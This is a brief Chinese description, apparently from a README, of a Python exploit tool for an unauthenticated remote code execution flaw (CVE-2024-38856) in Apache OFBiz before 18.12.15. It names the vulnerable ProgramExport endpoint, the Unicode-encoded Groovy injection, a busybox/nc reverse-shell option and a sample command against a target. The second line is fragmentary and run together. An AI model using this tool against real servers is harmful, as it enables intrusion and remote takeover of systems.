该 Python 脚本可利用 Apache OFBiz(版本 < 18.12.15)中的远程代码执行(RCE)漏洞,通过未授权访问 /webtools/control/forgotPassword/ProgramExport 端点实现攻击。
POST 发送转换为 Unicode(\uXXXX)的 Groovy 代码注入。--cmd)busybox/nc 反弹 Shell (--shell)python3 cve-2024-38856_Scanner.py -u https://TARGET:8443 -c "id"